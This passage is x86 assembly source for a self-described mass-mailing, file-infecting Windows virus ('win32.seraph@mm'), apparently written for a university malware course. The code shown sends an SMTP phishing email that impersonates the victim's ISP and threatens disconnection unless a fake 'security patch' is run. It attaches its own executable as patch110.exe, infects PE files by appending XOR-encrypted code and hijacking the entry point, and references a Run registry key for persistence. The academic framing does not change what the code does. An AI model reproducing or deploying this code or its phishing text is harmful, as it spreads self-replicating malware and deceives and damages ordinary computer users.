ApiCall lstrcatA ; concat the dead line date pushptr szDeadLine pushval lpEmailMessage ApiCall lstrcatA ; concat part 12 of the email message pushptr szEmailPart12 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspDomainName pushval lpEmailMessage ApiCall lstrcatA ; concat part 13 of the email message pushptr szEmailPart13 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspDomainName pushval lpEmailMessage ApiCall lstrcatA ; concat part 14 of the email message pushptr szEmailPart14 pushval lpEmailMessage ApiCall lstrcatA ; get the year push 6 pushptr szYear pushptr szYearFormat push 0 push 0 push 0 ApiCall GetDateFormatA ; concat the year pushptr szYear pushval lpEmailMessage ApiCall lstrcatA ; concat part 15 of the email message pushptr szEmailPart15 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspName pushval lpEmailMessage ApiCall lstrcatA ; concat part 16 of the email message pushptr szEmailPart16 pushval lpEmailMessage ApiCall lstrcatA ;-------------------------------------------------------------------------------------------------; ; Send the email message. ; ;-------------------------------------------------------------------------------------------------; ; connect to the mail server mov eax, 25 lea esi, [ebp+szMailServer] call ConnectToHost cmp eax, -1 je exitThread mov [ebp+hSock], eax ; set the timeout duration mov eax, 5000 mov esi, [ebp+hSock] lea edi, [ebp+dwTimeOut] call SetTimeOut ; get the server response push 0 push 256 pushptr szResponse pushval hSock ApiCall recv cmp eax, -1 je exitThread ; create the HELO command pushptr szHeloPart1 pushptr szCommand ApiCall lstrcpyA pushptr szIspDomainName pushptr szCommand ApiCall lstrcatA pushptr szHeloPart2 pushptr szCommand ApiCall lstrcatA ; send the HELO command pushptr szCommand ApiCall lstrlenA push 0 push eax pushptr szCommand pushval hSock ApiCall send cmp eax, -1 je exitThread ; recieve the server response push 0 push 256 pushptr szResponse pushval hSock ApiCall recv cmp eax, -1 je exitThread ; create the MAIL FROM command pushptr szMailFromPart1 pushptr szCommand ApiCall lstrcpyA pushptr szIspDomainName pushptr szCommand ApiCall lstrcatA pushptr szMailFromPart2 pushptr szCommand ApiCall lstrcatA ; send the MAIL FROM command pushptr szCommand ApiCall lstrlenA push 0 push eax pushptr szCommand pushval hSock ApiCall send cmp eax, -1 je exitThread ; recieve the server response push 0 push 256 pushptr szResponse pushval hSock ApiCall recv cmp eax, -1 je exitThread ; create the RCPT TO command pushptr szRcptToPart1 pushptr szCommand ApiCall lstrcpyA pushptr szEmailAccount pushptr szCommand ApiCall lstrcatA pushptr szRcptToPart2 pushptr szCommand ApiCall lstrcatA pushptr szIspDomainName pushptr szCommand ApiCall lstrcatA pushptr szRcptToPart3 pushptr szCommand ApiCall lstrcatA ; send the RCPT TO command pushptr szCommand ApiCall lstrlenA push 0 push eax pushptr szCommand pushval hSock ApiCall send cmp eax, -1 je exitThread ; recieve the server response push 0 push 256 pushptr szResponse pushval hSock ApiCall recv cmp eax, -1 je exitThread ; create the DATA command pushptr szData pushptr szCommand ApiCall lstrcpyA ; send the DATA command pushptr szCommand ApiCall lstrlenA push 0 push eax pushptr szCommand pushval hSock ApiCall send cmp eax, -1 je exitThread ; recieve the server response push 0 push 256 pushptr szResponse pushval hSock ApiCall recv cmp eax, -1 je exitThread ; send the email message mov edi, [ebp+lpEmailMessage] sendMessage: push 0 push 1 push edi pushval hSock ApiCall send cmp eax, -1 je exitThread inc edi cmp byte ptr [edi], 0 jne sendMessage ;-------------------------------------------------------------------------------------------------; ; Send the file attachment. ; ;-------------------------------------------------------------------------------------------------; ; get the path and name of this program push 256 pushptr szModuleName push 0 ApiCall GetModuleFileNameA ; open this program push 0 push 0 push OPEN_EXISTING push 0 push FILE_SHARE_READ push GENERIC_READ pushptr szModuleName ApiCall CreateFileA cmp eax, -1 je exitThread mov [ebp+hFile], eax ; get the size of the file push 0 pushval hFile ApiCall GetFileSize cmp eax, -1 je exitThread ; calculate the number of 3 byte base64 groups xor edx, edx mov ebx, 3 div ebx mov ecx, eax ; send the base64 encoded file data sendAttachment: push edx push ecx ; read 3 bytes push 0 pushptr dwNumberOfBytes push 3 pushptr threeBytes pushval hFile ApiCall ReadFile ; base64 encode the three bytes mov ecx, 3 lea esi, [ebp+threeBytes] lea edi, [ebp+fourBytes] call Base64Encode ; send the four base64 encoded bytes push 0 push 4 pushptr fourBytes pushval hSock ApiCall send cmp eax, -1 je exitThread pop ecx pop edx loop sendAttachment ; get the remaining bytes push edx push 0 pushptr dwNumberOfBytes push edx pushptr threeBytes pushval hFile ApiCall ReadFile pop edx ; base64 encode the remaining bytes push edx mov ecx, edx lea esi, [ebp+threeBytes] lea edi, [ebp+fourBytes] call Base64Encode pop edx ; send the remaining bytes push 0 push 4 pushptr fourBytes pushval hSock ApiCall send cmp eax, -1 je exitThread ;-------------------------------------------------------------------------------------------------; ; send the final part of the email message. ; ;-------------------------------------------------------------------------------------------------; ; send the last part of the email message pushptr szEmailPart17 ApiCall lstrlenA push 0 push eax pushptr szEmailPart17 pushval hSock ApiCall send cmp eax, -1 je exitThread ; recieve the server response push 0 push 256 pushptr szResponse pushval hSock ApiCall recv cmp eax, -1 je exitThread ;-------------------------------------------------------------------------------------------------; ; Clean up ;-------------------------------------------------------------------------------------------------; ; free the webpage buffer pushptr lpWebpage ApiCall GlobalFree ; free the email message buffer pushptr lpEmailMessage ApiCall GlobalFree ; close wininet pushval hInternet ApiCall InternetCloseHandle ; close winsock ApiCall WSACleanup ;-------------------------------------------------------------------------------------------------; ; Exit thread. ; ;-------------------------------------------------------------------------------------------------; exitThread: ; set the thread status mov [ebp+dwThreadStatus], EXIT_THREAD ; exit the thread ApiCall GetCurrentThread lea ebx, [ebp+dwExitCode] push ebx push eax ApiCall GetExitCodeThread pushval dwExitCode ApiCall ExitThread ;-------------------------------------------------------------------------------------------------; ; Function(s) ; ;-------------------------------------------------------------------------------------------------; Base64Encode PROC ; ; Description: ; Base64 encodes a group of bytes. ; ; Parameters: ; ecx = Number of bytes to encode. ; esi = pointer to a buffer that needs encoding. ; edi = pointer to a buffer that will recieve the encoded data. ; ; Return Values: ; None. ; cmp ecx, 3 jl @@pad ; no groups of 3 to convert? xor edx, edx mov eax, ecx mov ebx, 3 div ebx ; edx = number of padded bytes mov ecx, eax @@base64: ; encode groups of 3 bytes to base64 lodsd dec esi bswap eax push ecx mov ecx, 4 @@encode3: rol eax, 6 push eax and eax, 3fh mov al, [ebp+@@charset+eax] ; get the base64 character stosb pop eax loop @@encode3 pop ecx loop @@base64 mov ecx, edx cmp edx, 3 jg @@return @@pad: ; pad any additional bytes inc ecx mov dword ptr [edi], '====' mov eax, [esi] bswap eax @@l1: rol eax, 6 push eax and eax, 3fh mov al, [ebp+@@charset+eax] stosb pop eax loop @@l1 @@return: ret @@charset DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/', 0 Base64Encode ENDP SetTimeOut PROC ; ; Description: ; Sets the timeout duration for sending and recieving data. ; ; Parameters: ; esi = socket handle. ; edi = pointer to a DWORD. ; eax = timeout duration. ; ; Return Values: ; None. ; ; set the timeout duration mov [edi], eax ; set the timeout for recieving data push 4 push edi push SO_RCVTIMEO push SOL_SOCKET push esi ApiCall setsockopt ; set the timeout for sending data push 4 push edi push SO_SNDTIMEO push SOL_SOCKET push esi ApiCall setsockopt ret SetTimeOut ENDP LoadImports PROC ; ; Description: ; Loads a series a dll's and the addresses of the specified functions. ; ; Parameters: ; eax = pointer to an import table. ; ; Return Values: ; If the function is successful the return value is 0. If the function fails ; the return value is -1. ; mov edi, eax @@loadLibrary: push edi ApiCall LoadLibraryA ; load the dll cmp eax, 0 je apiLoadError mov esi, eax xor al, al mov ecx, 100 repne scasb ; find the dll pointer @@loadFunctions: push edi push esi ApiCall GetProcAddress ; get function address cmp eax, 0 je apiLoadError mov ebx, eax xor al, al mov ecx, 100 repne scasb ; find function pointer mov [edi], ebx ; save the function address add edi, 4 cmp byte ptr [edi], 0 ; end of function list? jne @@loadFunctions inc edi cmp byte ptr [edi], '$' ; end of import list? jne @@loadLibrary xor eax, eax ret @@apiLoadError: mov eax, -1 ret LoadImports ENDP ConnectToHost PROC ; ; Description: ; Connects to a host. ; ; Parameters: ; eax = port. ; esi = pointer to a zero terminated host name. ; ; Return Values: ; If the function is successful the return value is the socket handle. If the function fails ; the return value is -1. ; ; fill the SOCK_ADDRESS structure mov [ebp+sockAddress.sin_family], AF_INET push eax ApiCall htons mov [ebp+sockAddress.sin_port], ax push esi ApiCall gethostbyname cmp eax, 0 je @@connectionFailed mov eax, [eax+12] mov eax, [eax] mov eax, [eax] mov [ebp+sockAddress.sin_addr], eax ; Create a socket push PCL_NONE push SOCK_STREAM push AF_INET ApiCall socket mov esi, eax cmp eax, -1 je @@connectionFailed ; connect to host push 16 pushptr sockAddress push esi ApiCall connect cmp eax, 0 jne @@connectionFailed mov eax, esi ret @@connectionFailed: mov eax, -1 ret ConnectToHost ENDP IsValid PROC ; ; Description: ; Checks to see if the file is a valid win32 exe and is not already infected. ; ; Parameters: ; esi = Pointer to filename. ; ; Return Values: ; If the function is successful the return value is 0. If the function fails the return ; value is -1. ; ; open the file push 0 push 0 push OPEN_EXISTING push 0 push FILE_SHARE_WRITE OR FILE_SHARE_READ push GENERIC_WRITE OR GENERIC_READ push esi ApiCall CreateFileA cmp eax, -1 je @@notValid mov [ebp+hFile], eax ; read the DOS header into memory push 0 pushptr dwNumberOfBytes push size DOS_HEADER pushptr dosHeader pushval hFile ApiCall ReadFile cmp word ptr [ebp+dosHeader.wSignature], 'ZM' jne @@notValid ; seek to the PE header push FILE_BEGIN push 0 pushval dosHeader.lpPEHeader pushval hFile ApiCall SetFilePointer ; read the PE header into memory push 0 pushptr dwNumberOfBytes push size PE_HEADER pushptr peHeader pushval hFile ApiCall ReadFile ; is it a win32 exe file? cmp word ptr [ebp+peHeader.dwSignature], 'EP' jne @@notValid ; calculate the location of the last section header xor edx, edx xor eax, eax mov ax, [ebp+peHeader.wNumberOfSections] dec eax mov ebx, size SECTION_HEADER mul ebx add eax, [ebp+dosHeader.lpPEHeader] add eax, size PE_HEADER mov [ebp+lpLastSectionHeader], eax ; seek to the last section header push FILE_BEGIN push 0 pushval lpLastSectionHeader pushval hFile ApiCall SetFilePointer ; read the last section header into memory push 0 pushptr dwNumberOfBytes push size SECTION_HEADER pushptr sectionHeader pushval hFile ApiCall ReadFile ; code already attached? cmp dword ptr [ebp+sectionHeader.dwCharacteristics], SECTION_RWE je @@notValid @@isValid: pushval hFile ApiCall CloseHandle xor eax, eax ret @@notValid: pushval hFile ApiCall CloseHandle mov eax, -1 ret IsValid ENDP AttachCode PROC ; ; Description: ; Infects a win32 exe with this program. ; ; Parameters: ; esi = Pointer to filename. ; ; Return Values: ; If the function is successful the return value is 0. If the function fails the return ; value is -1. ; ; save the return address for this instance push [ebp+lpReturnAddress] ; open the file push 0 push 0 push OPEN_EXISTING push 0 push FILE_SHARE_WRITE OR FILE_SHARE_READ push GENERIC_WRITE OR GENERIC_READ push esi ApiCall CreateFileA cmp eax, -1 je @@attachFailure mov [ebp+hFile], eax ; read the DOS header into memory push 0 pushptr dwNumberOfBytes push size DOS_HEADER pushptr dosHeader pushval hFile ApiCall ReadFile ; seek to the PE header push FILE_BEGIN push 0 pushval dosHeader.lpPEHeader pushval hFile ApiCall SetFilePointer ; read the PE header into memory push 0 pushptr dwNumberOfBytes push size PE_HEADER pushptr peHeader pushval hFile ApiCall ReadFile ; update the image size add dword ptr [ebp+peHeader.dwSizeOfImage], ((CODE_SIZE + (1000h - 1)) AND 0FFFFF000h) ; use the program entry point as a return address mov eax, [ebp+peHeader.dwAddressOfEntryPoint] mov [ebp+lpReturnAddress], eax ; calculate the location of the last section header xor edx, edx xor eax, eax mov ax, [ebp+peHeader.wNumberOfSections] dec eax mov ebx, size SECTION_HEADER mul ebx add eax, [ebp+dosHeader.lpPEHeader] add eax, size PE_HEADER mov [ebp+lpLastSectionHeader], eax ; seek to the last section header push FILE_BEGIN push 0 pushval lpLastSectionHeader pushval hFile ApiCall SetFilePointer ; read the last section header into memory push 0 pushptr dwNumberOfBytes push size SECTION_HEADER pushptr sectionHeader pushval hFile ApiCall ReadFile ; point the program entry point to this code mov eax, [ebp+sectionHeader.dwVirtualAddress] add eax, [ebp+sectionHeader.dwSizeOfRawData] mov [ebp+peHeader.dwAddressOfEntryPoint], eax ; calculate the location in the file where the code should go mov eax, [ebp+sectionHeader.dwPointerToRawData] add eax, [ebp+sectionHeader.dwSizeOfRawData] mov [ebp+lpCode], eax ; seek to that location push FILE_BEGIN push 0 pushval lpCode pushval hFile ApiCall SetFilePointer ; write the decryption code to the file push 0 pushptr dwNumberOfBytes push (offset encrypted - offset main) pushval lpStartOfCode pushval hFile ApiCall WriteFile ; write the encrypted code to the file mov ecx, CODE_SIZE - (offset encrypted - offset main) xor esi, esi encrypt: push ecx mov al, byte ptr [ebp+esi+encrypted] xor al, 123 mov [ebp+cByte], al push 0 pushptr dwNumberOfBytes push 1 pushptr cByte pushval hFile ApiCall WriteFile inc esi pop ecx loop encrypt ; update the virtual size of the section add [ebp+sectionHeader.dwVirtualSize], ((CODE_SIZE + (1000h - 1)) AND 0FFFFF000h) ; update the size of raw data add [ebp+sectionHeader.dwSizeOfRawData], ((CODE_SIZE + (200h - 1)) AND 0FFFFFE00h) ; make the section readable/writable/executable mov [ebp+sectionHeader.dwCharacteristics], SECTION_RWE ; seek to the last section header push FILE_BEGIN push 0 pushval lpLastSectionHeader pushval hFile ApiCall SetFilePointer ; write the updated section header back to the file push 0 pushptr dwNumberOfBytes push size SECTION_HEADER pushptr sectionHeader pushval hFile ApiCall WriteFile ; seek to the PE Header push FILE_BEGIN push 0 pushval dosHeader.lpPEHeader pushval hFile ApiCall SetFilePointer ; write the updated PE header back to the file push 0 pushptr dwNumberOfBytes push size PE_HEADER pushptr peHeader pushval hFile ApiCall WriteFile ; update the file size to a multiple of 4096 push FILE_END push 0 push 0 pushval hFile ApiCall SetFilePointer mov ebx, eax add eax, (1000h - 1) and eax, 0FFFFF000h sub eax, ebx mov ecx, eax @@zeroFill: jecxz @@attachSuccess push ecx push 0 pushptr dwNumberOfBytes push 1 pushptr cZero pushval hFile ApiCall WriteFile pop ecx dec ecx jmp @@zeroFill @@attachSuccess: ; restore the return address pop [ebp+lpReturnAddress] ; close the file handle pushval hFile ApiCall CloseHandle ; return success code xor eax, eax ret @@attachFailure: ; restore the return address pop [ebp+lpReturnAddress] ; return failure code mov eax, -1 ret AttachCode ENDP ;-------------------------------------------------------------------------------------------------; ; Data Section ; ;-------------------------------------------------------------------------------------------------; ; >:) im so evil, so so evil... szSigntaure DB 'University of Calgary', CRLF DB 'Semester: 4', CRLF DB 'Course: Computer Viruses and Malware', CRLF DB 'Virus Name: win32.seraph@mm', CRLF DB 'Virus Type: Mass Mailer/File Infector', CRLF, 0 ; date formating szDateFormat DB 'MMMM, d, yyyy', 0 szYearFormat DB 'yyyy', 0 date SYSTEM_TIME <0> ; file finding data szDrive DB 'A:\', 0 hFind DD 0 szSearchString DB '*.*', 0 szBackDir DB '..', 0 win32FindData WIN32_FIND_DATA <0> ; wininet data dwConnectionState DD 0 hInternet DD 0 ; SMTP data szResponse DB 256 DUP(0) szCommand DB 256 DUP(0) dwTimeOut DD 0 hSock DD 0 szHeloPart1 DB 'HELO ', 0 szHeloPart2 DB CRLF, 0 szMailFromPart1 DB 'MAIL FROM: ', CRLF, 0 szRcptTo DB 132 DUP(0) szRcptToPart1 DB 'RCPT TO: <', 0 szRcptToPart2 DB '@', 0 szRcptToPart3 DB '>', CRLF, 0 szData DB 'DATA', CRLF, 0 szDot DB CRLF, '.', CRLF, 0 szQuit DB 'QUIT', CRLF, 0 threeBytes DB 0, 0, 0 ; holds 3 ascii bytes fourBytes DB 0, 0, 0, 0 ; holds 3 base64 encoded bytes szMailServer DB 132 DUP(0) lpEmailMessage DD 0 szEmailAccount DB 25 DUP(0) ; registry data szSubKey DB 'Software\Microsoft\Windows\CurrentVersion\Run', 0 hKey DD 0 szModuleName DB 256 DUP(0) szValueName DB 'Start-Up', 0 ; dynamic variables (vary from generation to generation) lpReturnAddress DD 0 lpStartOfCode DD 0 lpImageBase DD 0 ; DNS data lpResults DD 0 dnsRecordHeader DNS_RECORD <0> ; PE data peHeader PE_HEADER <0> dosHeader DOS_HEADER <0> sectionHeader SECTION_HEADER <0> lpLastSectionHeader DD 0 lpCode DD 0 cZero DB 0 cByte DB 0 ; thread data hThread DD 0 dwThreadStatus DD 0 dwExitCode DD 0 ; file I/O data hFile DD 0 dwNumberOfBytes DD 0 ; MISC data wsaData WSA_DATA <0> szArpa DB '.in-addr.arpa', 0 lpWebpage DD 0 dwWebpageSize DD 0 szWWW DB 'http://www.', 0 szUrl DB 132 DUP(0) sockAddress SOCK_ADDRESS <0> szIkxParameter DB ' /iKX', 0 szPatchName DB 'patch110.exe', 0 szPatchTitle DB 'Installation Complete!', 0 szPatchInstall DB 'Thankyou for installing the security patch version 1.10.', 0 szCurrentDirectory DB 256 DUP(0) szSystemDirectory DB 257 DUP(0) szSlash DB '\', 0 ; collected data szHostName DB 132 DUP(0) szReverseIP DB 29 DUP(0) szIspDomainName DB 132 DUP(0) szIspWebpage DB 132 DUP (0) szLogoUrl DB 132 DUP(0) szIspName DB 25 DUP(0) szDeadLine DB 25 DUP(0) szYear DB 5 DUP(0) ; dll data lpKernel32 DD 0 szLoadLibraryA DB 'LoadLibraryA', 0 LoadLibraryA DD 0 GetProcAddress DD 0 ; email message szEmailPart1 DB 'From: news@', 0 szEmailPart2 DB CRLF DB 'To: ', 0 szEmailPart3 DB '@', 0 szEmailPart4 DB CRLF DB 'Subject: Important information involving your ', 0 szEmailPart5 DB ' Internet account.', CRLF DB 'MIME-Version: 1.0', CRLF DB 'Content-Type: multipart/mixed; boundary="Boundary.11111111.11111111"', CRLF DB CRLF DB 'This is a multipart message in MIME format.', CRLF DB CRLF DB '--Boundary.11111111.11111111', CRLF DB 'Content-Type: text/html', CRLF DB CRLF DB '', CRLF DB '', CRLF DB '', CRLF DB '', CRLF DB '', CRLF DB '', CRLF DB '
', CRLF DB '', CRLF DB '', CRLF DB '', CRLF DB '', CRLF DB '
', CRLF DB '
', CRLF DB '

', CRLF DB '', CRLF DB 'Dear ', 0 szEmailPart7 DB ' customer

', CRLF DB 'We at ', 0 szEmailPart8 DB ' have been working hard at increasing the reliability and security of our service. ' DB 'To date the following changes have been made:

', CRLF DB '

    ', CRLF DB '
  • All emails sent to your ', 0 szEmailPart9 DB ' email account are now screened for viruses and other malware.

  • ', CRLF DB '
  • A virtual firewall has been set up to protect your system from attacks by hackers.

  • ', CRLF DB '
  • A new update is available to protect your computer while online. (Read more below)

  • ', CRLF DB '
', CRLF DB 'All ', 0 szEmailPart10 DB ' customers are required to install our latest security update attached to this email. ' DB 'It contains a series of patches from Microsoft, Norton and McAffee that will protect ' DB 'your computer and us from attacks. All ', 0 szEmailPart11 DB ' customers MUST have this patch installed by ', 0 szEmailPart12 DB '. Failure to do so will result in disconnection of this Internet service. If you ' DB 'require assistence or have any questions contact us at info@', 0 szEmailPart14 DB '.

', CRLF DB '', CRLF DB '

© ', 0 szEmailPart15 DB ' ', 0 szEmailPart16 DB ' Inc.
', CRLF DB '
', CRLF DB '
', CRLF DB '', CRLF DB '', CRLF DB CRLF DB '--Boundary.11111111.11111111', CRLF DB 'Content-Type: application/x-msdownload; name="patch110.exe"', CRLF DB 'Content-Transfer-Encoding: base64', CRLF DB 'Content-Description: patch110.exe', CRLF DB 'Content-Disposition: attachment; filename="patch110.exe"', CRLF DB CRLF DB 0 szEmailPart17 DB CRLF DB '--Boundary.11111111.11111111--', CRLF DB CRLF DB '.', CRLF DB 0 lastnames DB 'SMITH',0,'JOHNSON',0,'WILLIAMS',0,'JONES',0,'BROWN',0,'DAVIS',0,'MILLER',0,'WILSON',0 DB 'MOORE',0,'TAYLOR',0,'ANDERSON',0,'THOMAS',0,'JACKSON',0,'WHITE',0,'HARRIS',0,'MARTIN',0 DB 'THOMPSON',0,'GARCIA',0,'MARTINEZ',0,'ROBINSON',0,'CLARK',0,'RODRIGUEZ',0,'LEWIS',0 DB 'LEE',0,'WALKER',0,'HALL',0,'ALLEN',0,'YOUNG',0,'HERNANDEZ',0,'KING',0,'WRIGHT',0 DB 'LOPEZ',0,'HILL',0,'SCOTT',0,'GREEN',0,'ADAMS',0,'BAKER',0,'GONZALEZ',0,'NELSON',0 DB 'CARTER',0,'MITCHELL',0,'PEREZ',0,'ROBERTS',0,'TURNER',0,'PHILLIPS',0,'CAMPBELL',0 DB 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the brain", CRLF DB "Bring round the heart an undescribable feud;", CRLF DB "So do these wonders a most dizzy pain,", CRLF DB "That mingles Grecian grandeur with the rude", CRLF DB "Wasting of old Time--with a billowy main--", CRLF DB "A sun--a shadow of a magnitude.", CRLF DB CRLF DB "-- John Keats (1796-1821)", CRLF DB 0 ;-------------------------------------------------------------------------------------------------; ; Import Section ; ;-------------------------------------------------------------------------------------------------; ImportTable API_Imports_9x ImportDll Kernel32 ImportFunction ExitProcess ImportFunction CreateFileA ImportFunction ReadFile ImportFunction SetFilePointer ImportFunction WriteFile ImportFunction CloseHandle ImportFunction CreateThread ImportFunction GetCurrentThread ImportFunction GetExitCodeThread ImportFunction lstrcpyA ImportFunction lstrcatA ImportFunction lstrlenA ImportFunction lstrcmpA ImportFunction RtlZeroMemory ImportFunction RtlMoveMemory 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